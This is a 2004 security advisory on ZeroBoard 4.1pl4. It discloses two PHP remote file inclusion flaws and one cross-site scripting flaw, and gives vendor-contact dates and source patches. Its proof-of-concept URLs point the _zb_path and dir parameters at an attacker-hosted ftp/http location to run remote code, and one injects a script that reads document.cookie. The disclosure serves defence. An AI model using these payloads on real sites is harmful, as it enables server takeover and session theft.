STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site
scripting vulnerabilities in ZeroBoard
Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team (advisory@stgsecurity.com)
Summary
=======
ZeroBoard is one of widely used web BBS applications in Korea. . However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.
Vulnerability Class
===================
Implementation Error: Input validation flaw
Impact
======
High : arbitrary commands execution.
Affected Products
================
ZeroBoard 4.1pl4 and prior
Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't replied.
2004-11-22 2nd vendor contact, but they didn't replied.
2004-12-13 STG Security, Inc. customer notified.
2004-12-24 Official release.
Details
=======
Vulnerability 1 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/
- - - Environment
PHP 5.0.x
php.ini : register_globals = On
- - - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers explained at
http://www.php.net/manual/en/function.file-exists.php. Thus _zb_path
parameter in outlogin.php can be easily exploited.
- - - Part of vulnerable source, outlogin.php.
- - ----
// 제로보드 디렉토리
인지 체크
if(!file_exists($_zb_path."lib.php")) {
echo "제로보드
디렉토리가 아닙니다";
return;
}
// _head.php 읽음
@include $_zb_path."_head.php";
}
- - ----
Vulnerability 2 : PHP source injection vulnerability
- - ------------------------------------
- - - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/
- - - Environment
php.ini: register_globals = On
- - - Reason
Uninitialized $dir variable in write.php
- - - Part of vulnerable source, include/write.php
- - ----
include $dir."/write.php";
- - ----
Vulnerability 3 : Cross-site scripting vulnerability
- - --------------------------------------
- - - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>
- - - Reason
check_user_id.php doesn't validate the input value of user_id.
- - - Part of vulnerable source, check_user_id.php
- - ----
$user_id = trim($user_id);
... 생략 ...
if($check[0]) echo "$user_id 는 이미
등록된<br> 아이디입니다";
else echo"$user_id 는 사용하실수
있습니다";
... 생략 ...
- - ----
Workaround
==========
Without official patches of theses vulnerability, modify the vulnerable
sources as following recommendations.
Vulnerability 1: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 59th line of outlogin.php,
if(eregi(":\/\/",$_zb_path)) $_zb_path="";
Vulnerability 2: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 15th line of include/write.php,
if(eregi(":\/\/",$dir)) $dir="";
Vulnerability 3: As of zboard 4.1pl4
- - ----------------------------
Insert the following code at 3rd line of check_user_id.php,
$user_id = htmlspecialchars(trim($user_id));
Credits
======
Jeremy Bae at STG Security
